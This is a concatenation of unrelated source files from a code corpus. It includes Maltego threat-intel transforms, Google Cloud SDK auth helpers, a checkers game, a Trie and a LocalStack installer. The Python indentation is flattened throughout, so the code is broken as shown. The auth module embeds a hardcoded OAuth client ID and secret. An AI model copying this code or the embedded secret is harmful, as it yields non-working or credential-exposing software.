# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('post')
op.drop_table('category')
# ### end Alembic commands ###
|
the-stack_0_12306 | """
Programa 115
Área de estudos.
data 13.12.2020 (Indefinida) Hs
@Autor: Abraão A. Silva
"""
# Abrimos um arquivo para gravação de dados.
arquivo = open('/home/abraao/Documentos/testando.txt', 'w') # Modo 'w' sobrescreve o arquivo.
while True:
nome = str(input('Nome: '))
if nome.isdigit():
print('Programa encerrado.')
break
else:
arquivo.write(nome+'\n')
arquivo.close()
# Ou
arquivo = open('/home/abraao/Documentos/testando.txt', 'a') # Modo 'a' Anexa uma atrás da outra.
for n in range(3):
nome = str(input('Nome: '))
arquivo.write(nome+'\n')
arquivo.close()
|
the-stack_0_12307 | # -*- coding: utf-8 -*-
"""
Created on Sun Mar 25 18:47:55 2018
@author: bokorn
"""
import cv2
import numpy as np
import tensorflow as tf
def convertSummary(val):
if(val.HasField('simple_value')):
return val.simple_value
elif(val.HasField('obsolete_old_style_histogram')):
raise NotImplementedError()
elif(val.HasField('image')):
return cv2.imdecode(np.frombuffer(val.image.encoded_image_string, np.uint8), cv2.IMREAD_COLOR)
elif(val.HasField('histo')):
return {'bins':val.histo.bucket, 'lims':val.histo.bucket_limit}
elif(val.HasField('audio')):
raise NotImplementedError()
elif(val.HasField('tensor')):
raise NotImplementedError()
return val.tensor.string_val
else:
raise ValueError('Invalid summary type %'.format(val))
def getSummaryData(path, tags):
if(type(tags) is str):
tags = [tags]
data = {}
for t in tags:
data[t] = []
try:
for e in tf.train.summary_iterator(path):
for v in e.summary.value:
if v.tag in tags:
data[v.tag].append([e.step, convertSummary(v)])
except Exception as e:
print(e)
pass
return data
def getWallTime(path):
data = []
try:
for e in tf.train.summary_iterator(path):
data.append([e.step, e.wall_time])
except Exception as e:
print(e)
pass
return data
|
the-stack_0_12311 | from .concat_vec_env import ConcatVecEnv
from .multiproc_vec import ProcConcatVec
class call_wrap:
def __init__(self, fn, data):
self.fn = fn
self.data = data
def __call__(self, *args):
return self.fn(self.data)
def MakeCPUAsyncConstructor(max_num_cpus):
if max_num_cpus == 0:
return ConcatVecEnv
else:
def constructor(env_fn_list, obs_space, act_space):
example_env = env_fn_list[0]()
envs_per_env = getattr(example_env, "num_envs", 1)
num_fns = len(env_fn_list)
envs_per_cpu = (num_fns + max_num_cpus - 1) // max_num_cpus
alloced_num_cpus = (num_fns + envs_per_cpu - 1) // envs_per_cpu
env_cpu_div = []
num_envs_alloced = 0
while num_envs_alloced < num_fns:
start_idx = num_envs_alloced
end_idx = min(num_fns, start_idx + envs_per_cpu)
env_cpu_div.append(env_fn_list[start_idx:end_idx])
num_envs_alloced = end_idx
assert alloced_num_cpus == len(env_cpu_div)
cat_env_fns = [call_wrap(ConcatVecEnv, env_fns) for env_fns in env_cpu_div]
return ProcConcatVec(cat_env_fns, obs_space, act_space, num_fns * envs_per_env)
return constructor
|
the-stack_0_12314 | import sys
from helpers import api_qradio as q
from helpers import MaltegoTransform
##############################################################
## ENRICH Section
def ipv4_enrich(mt, ip_address):
enrich_list = q.ipv4_enrich(ip_address)
for domain in enrich_list['domains']:
mt.addEntity("maltego.Domain", domain)
for hash in enrich_list['hash']:
mt.addEntity("maltego.Hash", hash)
for score in enrich_list['score']:
mt.addEntity("maltego.Score", score)
mt.addEntity("maltego.Blacklist", str(enrich_list['blacklist']))
return mt
def domain_enrich(mt, domain_name):
enrich_list = q.domain_enrich(domain_name)
for ip_address in enrich_list['ip_address']:
mt.addEntity("maltego.IPv4Address", ip_address)
for hash in enrich_list['hash']:
mt.addEntity("maltego.Hash", hash)
for score in enrich_list['score']:
mt.addEntity("maltego.Score", score)
return mt
def hash_enrich(mt, hash_value):
enrich_list = q.hash_enrich(hash_value)
for score in enrich_list:
mt.addEntity("maltego.Score", score['score'])
for ip_address in enrich_list:
mt.addEntity("maltego.IPv4Address", ip_address['ip_address'])
for imphash in enrich_list:
mt.addEntity("maltego.Imphash", imphash['imphash'])
for uri in enrich_list:
mt.addEntity("maltego.URI", uri['uri'])
return mt
##############################################################
## IP section
def ipv4_to_domain(mt, ip_address):
domain_list = q.ipv4_to_domain(ip_address)
for domain in domain_list:
mt.addEntity("maltego.Domain", domain)
return mt
def ipv4_to_hash(mt, ip_address):
hash_list = q.ipv4_to_hash(ip_address)
for hash in hash_list:
mt.addEntity("maltego.Hash", hash)
return mt
def ipv4_to_blacklist(mt, ip_address):
blacklisted = q.ipv4_to_blacklist(ip_address)
mt.addEntity("maltego.Blacklist", blacklisted)
return mt
def ipv4_to_score(mt, ip_address):
score_list = q.ipv4_to_score(ip_address)
for score in score_list:
mt.addEntity("maltego.Score", score)
return mt
##############################################################
## Domain section
def domain_to_ipv4(mt, domain_name):
ip_list = q.domain_to_ipv4(domain_name)
for ip_address in ip_list:
mt.addEntity("maltego.IPv4Address", ip_address)
return mt
def domain_to_hash(mt, domain_name):
hash_list = q.domain_to_hash(domain_name)
for hash in hash_list:
mt.addEntity("maltego.Hash", hash)
return mt
def domain_to_score(mt, domain_name):
score_list = q.domain_to_score(domain_name)
for score in score_list:
mt.addEntity("maltego.Score", score)
return mt
##############################################################
## Hash section
def hash_to_score(mt, hash_valuse):
score_list = q.hash_to_score(hash_valuse)
for score in score_list:
mt.addEntity("maltego.Score", score)
return mt
def hash_to_imphash(mt, hash_valuse):
imphash_list = q.hash_to_imphash(hash_valuse)
for imphash in imphash_list:
mt.addEntity("maltego.Imphash", imphash)
return mt
def hash_to_ipv4(mt, hash_valuse):
ip_list = q.hash_to_ipv4(hash_valuse)
for ip_address in ip_list:
mt.addEntity("maltego.IPv4Address", ip_address)
return mt
def hash_to_uri(mt, hash_valuse):
uri_list = q.hash_to_uri(hash_valuse)
for uri in uri_list:
mt.addEntity("maltego.URI", uri)
return mt
##############################################################
## Imphash section
def imphash_to_hash(mt, imphash):
hash_list = q.imphash_to_hash(imphash)
for hash in hash_list:
mt.addEntity("maltego.Hash", hash)
return mt
##############################################################
functions = {
'ipv4_enrich': ipv4_enrich,
'domain_enrich': domain_enrich,
'hash_enrich': hash_enrich,
'ipv4_to_domain': ipv4_to_domain,
'ipv4_to_hash': ipv4_to_hash,
'ipv4_to_blacklist': ipv4_to_blacklist,
'ipv4_to_score': ipv4_to_score,
'domain_to_ipv4': domain_to_ipv4,
'domain_to_hash': domain_to_hash,
'domain_to_score': domain_to_score,
'hash_to_score': hash_to_score,
'hash_to_imphash': hash_to_imphash,
'hash_to_ipv4': hash_to_ipv4,
'hash_to_uri': hash_to_uri,
'imphash_to_hash': imphash_to_hash,
}
##### MAIN #####
if __name__ == '__main__':
transform = sys.argv[1]
data = sys.argv[2]
mt = MaltegoTransform()
result = functions[transform](mt, data)
result.returnOutput() |
the-stack_0_12315 |
class Node():
def __init__(self, alphabet):
self.char = alphabet
self.children = []
self.end_of_word = False
self.counter = 1
'''
Create a tree of alphabets like this:
+
/ \
c d
/ \
a o
/ \ \
t p g
'''
class Trie():
def __init__(self):
self.root = Node('+')
def addWord(self, word):
node = self.root
for letter in word:
found_flag = False
for child in node.children:
if child.char == letter:
child.counter += 1
node = child
found_flag = True
break
if not found_flag:
newChild = Node(letter)
node.children.append(newChild)
node = newChild
node.end_of_word = True
def findWord(self, word):
node = self.root
for letter in word:
found_flag = False
for child in node.children:
if child.char == letter:
node = child
found_flag = True
break
return found_flag and node.end_of_word
def delWord(self, word):
node = self.root
if(not self.findWord(word)):
print("Word not found")
return
for letter in word:
for child in node.children:
if child.char == letter:
if child.counter == 1:
node.children.remove(child)
return
else:
node = child
break
#In the case we want to delete 'dog' but keep 'dogs'
if letter == node.char:
node.end_of_word = False
return
print("Word not found")
return
def discover(self, node, prefix):
words = []
for child in node.children:
if child.end_of_word:
words.append(prefix + child.char)
if child.children:
words.extend(self.discover(child, prefix + child.char))
else:
words.extend(self.discover(child, prefix + child.char))
return words
def wordsWithPrefix(self, prefix):
node = self.root
found_flag = False
for letter in prefix:
found_flag = False
for child in node.children:
if letter == child.char:
node = child
found_flag = True
break
if not found_flag:
return []
return self.discover(node, prefix)
def allWords(self):
node = self.root
return self.discover(node, "")
|
the-stack_0_12318 | # -*- coding: utf-8 -*- #
# Copyright 2016 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A library to support auth commands."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import json
from googlecloudsdk.core import context_aware
from googlecloudsdk.core import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import yaml
from googlecloudsdk.core.credentials import flow as c_flow
from googlecloudsdk.core.credentials import google_auth_credentials as c_google_auth
from googlecloudsdk.core.util import files
# Client ID from project "usable-auth-library", configured for
# general purpose API testing
# pylint: disable=g-line-too-long
DEFAULT_CREDENTIALS_DEFAULT_CLIENT_ID = '764086051850-6qr4p6gpi6hn506pt8ejuq83di341hur.apps.googleusercontent.com'
DEFAULT_CREDENTIALS_DEFAULT_CLIENT_SECRET = 'd-FL95Q19q7MQmFpd7hHD0Ty'
CLOUD_PLATFORM_SCOPE = 'https://www.googleapis.com/auth/cloud-platform'
GOOGLE_DRIVE_SCOPE = 'https://www.googleapis.com/auth/drive'
USER_EMAIL_SCOPE = 'https://www.googleapis.com/auth/userinfo.email'
OPENID = 'openid'
DEFAULT_SCOPES = [
OPENID,
USER_EMAIL_SCOPE,
CLOUD_PLATFORM_SCOPE
]
CLIENT_SECRET_INSTALLED_TYPE = 'installed'
class Error(exceptions.Error):
"""A base exception for this class."""
pass
class InvalidClientSecretsError(Error):
"""An error for when we fail to load the client secrets file."""
pass
class BadCredentialFileException(Error):
"""Raised when credentials file cannot be read."""
pass
def GetCredentialsConfigFromFile(filename):
"""Returns the JSON content of a credentials config file.
This function is useful when the content of a file need to be inspected first
before determining how to handle it (how to initialize the underlying
credentials). Only UTF-8 JSON files are supported.
Args:
filename (str): The filepath to the ADC file representing credentials.
Returns:
Optional(Mapping): The JSON content.
Raises:
BadCredentialFileException: If JSON parsing of the file fails.
"""
try:
# YAML is a superset of JSON.
content = yaml.load_path(filename)
except UnicodeDecodeError as e:
raise BadCredentialFileException(
'File {0} is not utf-8 encoded: {1}'.format(filename, e))
except yaml.YAMLParseError as e:
raise BadCredentialFileException('Could not read json file {0}: {1}'.format(
filename, e))
# Require the JSON content to be an object.
# Credentials and configs are always objects.
if not isinstance(content, dict):
raise BadCredentialFileException(
'Could not read json file {0}'.format(filename))
return content
def DoInstalledAppBrowserFlowGoogleAuth(launch_browser,
scopes,
client_id_file=None):
"""Launches a 3LO oauth2 flow to get google-auth credentials.
Args:
launch_browser: bool, True to launch the browser, false to ask users to copy
the auth url to a browser.
scopes: [str], The list of scopes to authorize.
client_id_file: str, The path to a file containing the client id and secret
to use for the flow. If None, the default client id for the Cloud SDK is
used.
Returns:
google.auth.credentials.Credentials, The credentials obtained from the flow.
"""
if client_id_file:
AssertClientSecretIsInstalledType(client_id_file)
google_auth_flow = c_flow.CreateGoogleAuthFlow(scopes, client_id_file)
try:
user_creds = c_flow.RunGoogleAuthFlow(google_auth_flow, launch_browser)
return c_google_auth.Credentials.FromGoogleAuthUserCredentials(
user_creds)
except c_flow.Error as e:
if context_aware.IsContextAwareAccessDeniedError(e):
msg = context_aware.CONTEXT_AWARE_ACCESS_HELP_MSG
else:
msg = 'There was a problem with web authentication.'
if launch_browser:
msg += ' Try running again with --no-launch-browser.'
log.error(msg)
raise
def GetClientSecretsType(client_id_file):
"""Get the type of the client secrets file (web or installed)."""
invalid_file_format_msg = (
'Invalid file format. See '
'https://developers.google.com/api-client-library/'
'python/guide/aaa_client_secrets')
try:
obj = json.loads(files.ReadFileContents(client_id_file))
except files.Error:
raise InvalidClientSecretsError(
'Cannot read file: "%s"' % client_id_file)
if obj is None:
raise InvalidClientSecretsError(invalid_file_format_msg)
if len(obj) != 1:
raise InvalidClientSecretsError(
invalid_file_format_msg + ' '
'Expected a JSON object with a single property for a "web" or '
'"installed" application')
return tuple(obj)[0]
def AssertClientSecretIsInstalledType(client_id_file):
client_type = GetClientSecretsType(client_id_file)
if client_type != CLIENT_SECRET_INSTALLED_TYPE:
raise InvalidClientSecretsError(
'Only client IDs of type \'%s\' are allowed, but encountered '
'type \'%s\'' % (CLIENT_SECRET_INSTALLED_TYPE, client_type))
|
the-stack_0_12321 | import pygame
from .board import Board
from .config import RED, WHITE, BLUE, BLACK, SQUARE_SIZE
class Game():
def __init__(self, win):
self.win = win
self._init()
def _init(self):
self.selected_piece = None
self.board = Board()
self.turn = RED
self.valid_moves = {}
def update(self):
self.board.draw(self.win)
self.draw_valid_moves(self.valid_moves)
pygame.display.update()
def reset(self):
self._init()
def select(self, row, col):
if self.selected_piece:
result = self._move(row, col)
if not result:
self.selected_piece = None
self.select(row, col)
piece = self.board.get_piece(row, col)
if piece != 0 and piece.color == self.turn:
self.selected_piece = piece
self.valid_moves = self.board.get_valid_moves(piece)
return True
return False
def _move(self, row, col):
piece = self.board.get_piece(row, col)
if self.selected_piece and piece == 0 and (row, col) in self.valid_moves:
self.board.move(self.selected_piece, row, col)
skipped = self.valid_moves[(row, col)]
if skipped:
self.board.remove(skipped)
self.change_turn()
return True
return False
def draw_valid_moves(self, moves):
for move in moves:
row, col = move
half_square_size = SQUARE_SIZE // 2
x_pos = col * SQUARE_SIZE + half_square_size
y_pos = row * SQUARE_SIZE + half_square_size
radius = 15
pygame.draw.circle(self.win, BLUE, (x_pos, y_pos), radius)
def change_turn(self):
self.valid_moves = {}
self.turn = BLUE if self.turn == RED else RED
def winner(self):
return self.board.winner(self.turn)
def get_board(self):
return self.board
def ai_move(self, board):
self.board = board
self.change_turn()
|
the-stack_0_12323 | #!/usr/bin/env python
import glob
import logging
import os
import platform
import re
import shutil
import sys
import tempfile
import time
import requests
from localstack import config
from localstack.config import KINESIS_PROVIDER
from localstack.constants import (
DEFAULT_SERVICE_PORTS,
DYNAMODB_JAR_URL,
DYNAMODB_JAR_URL_ALPINE,
ELASTICMQ_JAR_URL,
ELASTICSEARCH_DEFAULT_VERSION,
ELASTICSEARCH_DELETE_MODULES,
ELASTICSEARCH_PLUGIN_LIST,
ELASTICSEARCH_URLS,
INSTALL_DIR_INFRA,
KMS_URL_PATTERN,
LOCALSTACK_INFRA_PROCESS,
LOCALSTACK_MAVEN_VERSION,
MODULE_MAIN_PATH,
STS_JAR_URL,
)
from localstack.utils import bootstrap
from localstack.utils.common import is_windows
if __name__ == "__main__":
bootstrap.bootstrap_installation()
# noqa: E402
from localstack.utils.common import (
chmod_r,
download,
get_arch,
in_docker,
is_alpine,
load_file,
mkdir,
new_tmp_file,
parallelize,
rm_rf,
run,
save_file,
untar,
unzip,
)
INSTALL_DIR_NPM = "%s/node_modules" % MODULE_MAIN_PATH
INSTALL_DIR_DDB = "%s/dynamodb" % INSTALL_DIR_INFRA
INSTALL_DIR_KCL = "%s/amazon-kinesis-client" % INSTALL_DIR_INFRA
INSTALL_DIR_STEPFUNCTIONS = "%s/stepfunctions" % INSTALL_DIR_INFRA
INSTALL_DIR_KMS = "%s/kms" % INSTALL_DIR_INFRA
INSTALL_DIR_ELASTICMQ = "%s/elasticmq" % INSTALL_DIR_INFRA
INSTALL_PATH_LOCALSTACK_FAT_JAR = "%s/localstack-utils-fat.jar" % INSTALL_DIR_INFRA
INSTALL_PATH_DDB_JAR = os.path.join(INSTALL_DIR_DDB, "DynamoDBLocal.jar")
INSTALL_PATH_KCL_JAR = os.path.join(INSTALL_DIR_KCL, "aws-java-sdk-sts.jar")
INSTALL_PATH_STEPFUNCTIONS_JAR = os.path.join(INSTALL_DIR_STEPFUNCTIONS, "StepFunctionsLocal.jar")
INSTALL_PATH_KMS_BINARY_PATTERN = os.path.join(INSTALL_DIR_KMS, "local-kms.<arch>.bin")
INSTALL_PATH_ELASTICMQ_JAR = os.path.join(INSTALL_DIR_ELASTICMQ, "elasticmq-server.jar")
INSTALL_PATH_KINESALITE_CLI = os.path.join(INSTALL_DIR_NPM, "kinesalite", "cli.js")
INSTALL_PATH_KINESIS_MOCK = os.path.join(INSTALL_DIR_INFRA, "kinesis-mock")
URL_LOCALSTACK_FAT_JAR = (
"https://repo1.maven.org/maven2/"
+ "cloud/localstack/localstack-utils/{v}/localstack-utils-{v}-fat.jar"
).format(v=LOCALSTACK_MAVEN_VERSION)
MARKER_FILE_LIGHT_VERSION = "%s/.light-version" % INSTALL_DIR_INFRA
IMAGE_NAME_SFN_LOCAL = "amazon/aws-stepfunctions-local"
ARTIFACTS_REPO = "https://github.com/localstack/localstack-artifacts"
SFN_PATCH_CLASS = (
"com/amazonaws/stepfunctions/local/runtime/executors/task/LambdaTaskStateExecutor.class"
)
SFN_PATCH_CLASS_URL = "%s/raw/master/stepfunctions-local-patch/%s" % (
ARTIFACTS_REPO,
SFN_PATCH_CLASS,
)
# kinesis-mock version
KINESIS_MOCK_VERSION = os.environ.get("KINESIS_MOCK_VERSION") or "0.1.3"
KINESIS_MOCK_RELEASE_URL = (
"https://api.github.com/repos/etspaceman/kinesis-mock/releases/tags/" + KINESIS_MOCK_VERSION
)
DEBUGPY_MODULE = "debugpy"
DEBUGPY_DEPENDENCIES = ["gcc", "python3-dev", "musl-dev"]
# Target version for javac, to ensure compatibility with earlier JREs
JAVAC_TARGET_VERSION = "1.8"
# SQS backend implementation provider - either "moto" or "elasticmq"
SQS_BACKEND_IMPL = os.environ.get("SQS_PROVIDER") or "moto"
# TODO: 2019-10-09: Temporarily overwriting DDB, as we're hitting a SIGSEGV JVM crash with the latest version
OVERWRITE_DDB_FILES_IN_DOCKER = False
# set up logger
LOG = logging.getLogger(__name__)
def get_elasticsearch_install_version(version=None):
if config.SKIP_INFRA_DOWNLOADS:
return ELASTICSEARCH_DEFAULT_VERSION
return version or ELASTICSEARCH_DEFAULT_VERSION
def get_elasticsearch_install_dir(version=None):
version = get_elasticsearch_install_version(version)
if version == ELASTICSEARCH_DEFAULT_VERSION and not os.path.exists(MARKER_FILE_LIGHT_VERSION):
# install the default version into a subfolder of the code base
install_dir = os.path.join(INSTALL_DIR_INFRA, "elasticsearch")
else:
install_dir = os.path.join(config.TMP_FOLDER, "elasticsearch", version)
return install_dir
def install_elasticsearch(version=None):
version = get_elasticsearch_install_version(version)
install_dir = get_elasticsearch_install_dir(version)
installed_executable = os.path.join(install_dir, "bin", "elasticsearch")
if not os.path.exists(installed_executable):
log_install_msg("Elasticsearch (%s)" % version)
es_url = ELASTICSEARCH_URLS.get(version)
if not es_url:
raise Exception('Unable to find download URL for Elasticsearch version "%s"' % version)
install_dir_parent = os.path.dirname(install_dir)
mkdir(install_dir_parent)
# download and extract archive
tmp_archive = os.path.join(config.TMP_FOLDER, "localstack.%s" % os.path.basename(es_url))
download_and_extract_with_retry(es_url, tmp_archive, install_dir_parent)
elasticsearch_dir = glob.glob(os.path.join(install_dir_parent, "elasticsearch*"))
if not elasticsearch_dir:
raise Exception("Unable to find Elasticsearch folder in %s" % install_dir_parent)
shutil.move(elasticsearch_dir[0], install_dir)
for dir_name in ("data", "logs", "modules", "plugins", "config/scripts"):
dir_path = os.path.join(install_dir, dir_name)
mkdir(dir_path)
chmod_r(dir_path, 0o777)
# install default plugins
for plugin in ELASTICSEARCH_PLUGIN_LIST:
if is_alpine():
# https://github.com/pires/docker-elasticsearch/issues/56
os.environ["ES_TMPDIR"] = "/tmp"
plugin_binary = os.path.join(install_dir, "bin", "elasticsearch-plugin")
plugin_dir = os.path.join(install_dir, "plugins", plugin)
if not os.path.exists(plugin_dir):
LOG.info("Installing Elasticsearch plugin %s" % (plugin))
run("%s install -b %s" % (plugin_binary, plugin))
# delete some plugins to free up space
for plugin in ELASTICSEARCH_DELETE_MODULES:
module_dir = os.path.join(install_dir, "modules", plugin)
rm_rf(module_dir)
# disable x-pack-ml plugin (not working on Alpine)
xpack_dir = os.path.join(install_dir, "modules", "x-pack-ml", "platform")
rm_rf(xpack_dir)
# patch JVM options file - replace hardcoded heap size settings
jvm_options_file = os.path.join(install_dir, "config", "jvm.options")
if os.path.exists(jvm_options_file):
jvm_options = load_file(jvm_options_file)
jvm_options_replaced = re.sub(
r"(^-Xm[sx][a-zA-Z0-9\.]+$)", r"# \1", jvm_options, flags=re.MULTILINE
)
if jvm_options != jvm_options_replaced:
save_file(jvm_options_file, jvm_options_replaced)
def install_elasticmq():
if SQS_BACKEND_IMPL != "elasticmq":
return
# TODO remove this function if we stop using ElasticMQ entirely
if not os.path.exists(INSTALL_PATH_ELASTICMQ_JAR):
log_install_msg("ElasticMQ")
mkdir(INSTALL_DIR_ELASTICMQ)
# download archive
tmp_archive = os.path.join(config.TMP_FOLDER, "elasticmq-server.jar")
if not os.path.exists(tmp_archive):
download(ELASTICMQ_JAR_URL, tmp_archive)
shutil.copy(tmp_archive, INSTALL_DIR_ELASTICMQ)
def install_kinesis():
if KINESIS_PROVIDER == "kinesalite":
return install_kinesalite()
elif KINESIS_PROVIDER == "kinesis-mock":
return install_kinesis_mock()
else:
raise ValueError("unknown kinesis provider %s" % KINESIS_PROVIDER)
def install_kinesalite():
if not os.path.exists(INSTALL_PATH_KINESALITE_CLI):
log_install_msg("Kinesis")
run('cd "%s" && npm install' % MODULE_MAIN_PATH)
def install_kinesis_mock():
target_dir = INSTALL_PATH_KINESIS_MOCK
machine = platform.machine().lower()
system = platform.system().lower()
version = platform.version().lower()
is_probably_m1 = system == "darwin" and ("arm64" in version or "arm32" in version)
LOG.debug("getting kinesis-mock for %s %s", system, machine)
if (machine == "x86_64" or machine == "amd64") and not is_probably_m1:
if system == "windows":
bin_file = "kinesis-mock-mostly-static.exe"
elif system == "linux":
bin_file = "kinesis-mock-linux-amd64-static"
elif system == "darwin":
bin_file = "kinesis-mock-macos-amd64-dynamic"
else:
bin_file = "kinesis-mock.jar"
else:
bin_file = "kinesis-mock.jar"
bin_file_path = os.path.join(target_dir, bin_file)
if os.path.exists(bin_file_path):
LOG.debug("kinesis-mock found at %s", bin_file_path)
return bin_file_path
response = requests.get(KINESIS_MOCK_RELEASE_URL)
if not response.ok:
raise ValueError(
"Could not get list of releases from %s: %s" % (KINESIS_MOCK_RELEASE_URL, response.text)
)
github_release = response.json()
download_url = None
for asset in github_release.get("assets", []):
# find the correct binary in the release
if asset["name"] == bin_file:
download_url = asset["browser_download_url"]
break
if download_url is None:
raise ValueError(
"could not find required binary %s in release %s" % (bin_file, KINESIS_MOCK_RELEASE_URL)
)
mkdir(target_dir)
LOG.info("downloading kinesis-mock binary from %s", download_url)
download(download_url, bin_file_path)
chmod_r(bin_file_path, 0o777)
return bin_file_path
def install_local_kms():
local_arch = get_arch()
binary_path = INSTALL_PATH_KMS_BINARY_PATTERN.replace("<arch>", local_arch)
if not os.path.exists(binary_path):
log_install_msg("KMS")
mkdir(INSTALL_DIR_KMS)
kms_url = KMS_URL_PATTERN.replace("<arch>", local_arch)
download(kms_url, binary_path)
chmod_r(binary_path, 0o777)
def install_stepfunctions_local():
if not os.path.exists(INSTALL_PATH_STEPFUNCTIONS_JAR):
# pull the JAR file from the Docker image, which is more up-to-date than the downloadable JAR file
log_install_msg("Step Functions")
mkdir(INSTALL_DIR_STEPFUNCTIONS)
run("{dc} pull {img}".format(dc=config.DOCKER_CMD, img=IMAGE_NAME_SFN_LOCAL))
docker_name = "tmp-ls-sfn"
run(
("{dc} run --name={dn} --entrypoint= -d --rm {img} sleep 15").format(
dc=config.DOCKER_CMD, dn=docker_name, img=IMAGE_NAME_SFN_LOCAL
)
)
time.sleep(5)
run(
"{dc} cp {dn}:/home/stepfunctionslocal/ {tgt}".format(
dc=config.DOCKER_CMD, dn=docker_name, tgt=INSTALL_DIR_INFRA
)
)
run("mv %s/stepfunctionslocal/*.jar %s" % (INSTALL_DIR_INFRA, INSTALL_DIR_STEPFUNCTIONS))
rm_rf("%s/stepfunctionslocal" % INSTALL_DIR_INFRA)
# apply patches
patch_class_file = os.path.join(INSTALL_DIR_STEPFUNCTIONS, SFN_PATCH_CLASS)
if not os.path.exists(patch_class_file):
download(SFN_PATCH_CLASS_URL, patch_class_file)
cmd = 'cd "%s"; zip %s %s' % (
INSTALL_DIR_STEPFUNCTIONS,
INSTALL_PATH_STEPFUNCTIONS_JAR,
SFN_PATCH_CLASS,
)
run(cmd)
def install_dynamodb_local():
if OVERWRITE_DDB_FILES_IN_DOCKER and in_docker():
rm_rf(INSTALL_DIR_DDB)
is_in_alpine = is_alpine()
if not os.path.exists(INSTALL_PATH_DDB_JAR):
log_install_msg("DynamoDB")
# download and extract archive
tmp_archive = os.path.join(tempfile.gettempdir(), "localstack.ddb.zip")
dynamodb_url = DYNAMODB_JAR_URL_ALPINE if is_in_alpine else DYNAMODB_JAR_URL
download_and_extract_with_retry(dynamodb_url, tmp_archive, INSTALL_DIR_DDB)
# fix logging configuration for DynamoDBLocal
log4j2_config = """<Configuration status="WARN">
<Appenders>
<Console name="Console" target="SYSTEM_OUT">
<PatternLayout pattern="%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"/>
</Console>
</Appenders>
<Loggers>
<Root level="WARN"><AppenderRef ref="Console"/></Root>
</Loggers>
</Configuration>"""
log4j2_file = os.path.join(INSTALL_DIR_DDB, "log4j2.xml")
save_file(log4j2_file, log4j2_config)
run('cd "%s" && zip -u DynamoDBLocal.jar log4j2.xml || true' % INSTALL_DIR_DDB)
def install_amazon_kinesis_client_libs():
# install KCL/STS JAR files
if not os.path.exists(INSTALL_PATH_KCL_JAR):
mkdir(INSTALL_DIR_KCL)
tmp_archive = os.path.join(tempfile.gettempdir(), "aws-java-sdk-sts.jar")
if not os.path.exists(tmp_archive):
download(STS_JAR_URL, tmp_archive)
shutil.copy(tmp_archive, INSTALL_DIR_KCL)
# Compile Java files
from localstack.utils.kinesis import kclipy_helper
classpath = kclipy_helper.get_kcl_classpath()
if is_windows():
classpath = re.sub(r":([^\\])", r";\1", classpath)
java_files = "%s/utils/kinesis/java/cloud/localstack/*.java" % MODULE_MAIN_PATH
class_files = "%s/utils/kinesis/java/cloud/localstack/*.class" % MODULE_MAIN_PATH
if not glob.glob(class_files):
run(
'javac -source %s -target %s -cp "%s" %s'
% (JAVAC_TARGET_VERSION, JAVAC_TARGET_VERSION, classpath, java_files)
)
def install_lambda_java_libs():
# install LocalStack "fat" JAR file (contains all dependencies)
if not os.path.exists(INSTALL_PATH_LOCALSTACK_FAT_JAR):
log_install_msg("LocalStack Java libraries", verbatim=True)
download(URL_LOCALSTACK_FAT_JAR, INSTALL_PATH_LOCALSTACK_FAT_JAR)
def install_cloudformation_libs():
from localstack.services.cloudformation import deployment_utils
# trigger download of CF module file
deployment_utils.get_cfn_response_mod_file()
def install_component(name):
installers = {
"cloudformation": install_cloudformation_libs,
"dynamodb": install_dynamodb_local,
"kinesis": install_kinesis,
"kms": install_local_kms,
"sqs": install_elasticmq,
"stepfunctions": install_stepfunctions_local,
}
installer = installers.get(name)
if installer:
installer()
def install_components(names):
parallelize(install_component, names)
install_lambda_java_libs()
def install_all_components():
# load plugins
os.environ[LOCALSTACK_INFRA_PROCESS] = "1"
bootstrap.load_plugins()
# install all components
install_components(DEFAULT_SERVICE_PORTS.keys())
def install_debugpy_and_dependencies():
try:
import debugpy
assert debugpy
logging.debug("Debugpy module already Installed")
except ModuleNotFoundError:
logging.debug("Installing Debugpy module")
import pip
if hasattr(pip, "main"):
pip.main(["install", DEBUGPY_MODULE])
else:
pip._internal.main(["install", DEBUGPY_MODULE])
# -----------------
# HELPER FUNCTIONS
# -----------------
def log_install_msg(component, verbatim=False):
component = component if verbatim else "local %s server" % component
LOG.info("Downloading and installing %s. This may take some time." % component)
def download_and_extract(archive_url, target_dir, retries=0, sleep=3, tmp_archive=None):
mkdir(target_dir)
tmp_archive = tmp_archive or new_tmp_file()
if not os.path.exists(tmp_archive):
# create temporary placeholder file, to avoid duplicate parallel downloads
save_file(tmp_archive, "")
for i in range(retries + 1):
try:
download(archive_url, tmp_archive)
break
except Exception:
time.sleep(sleep)
_, ext = os.path.splitext(tmp_archive)
if ext == ".zip":
unzip(tmp_archive, target_dir)
elif ext == ".gz" or ext == ".bz2":
untar(tmp_archive, target_dir)
else:
raise Exception("Unsupported archive format: %s" % ext)
def download_and_extract_with_retry(archive_url, tmp_archive, target_dir):
try:
download_and_extract(archive_url, target_dir, tmp_archive=tmp_archive)
except Exception as e:
# try deleting and re-downloading the zip file
LOG.info("Unable to extract file, re-downloading ZIP archive %s: %s" % (tmp_archive, e))
rm_rf(tmp_archive)
download_and_extract(archive_url, target_dir, tmp_archive=tmp_archive)
def main():
if len(sys.argv) > 1:
os.environ["LOCALSTACK_API_KEY"] = os.environ.get("LOCALSTACK_API_KEY") or "test"
if sys.argv[1] == "libs":
print("Initializing installation.")
logging.basicConfig(level=logging.INFO)
logging.getLogger("requests").setLevel(logging.WARNING)
install_all_components()
if sys.argv[1] in ("libs", "testlibs"):
# Install additional libraries for testing
install_amazon_kinesis_client_libs()
print("Done.")
if __name__ == "__main__":
main()
|
the-stack_0_12324 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
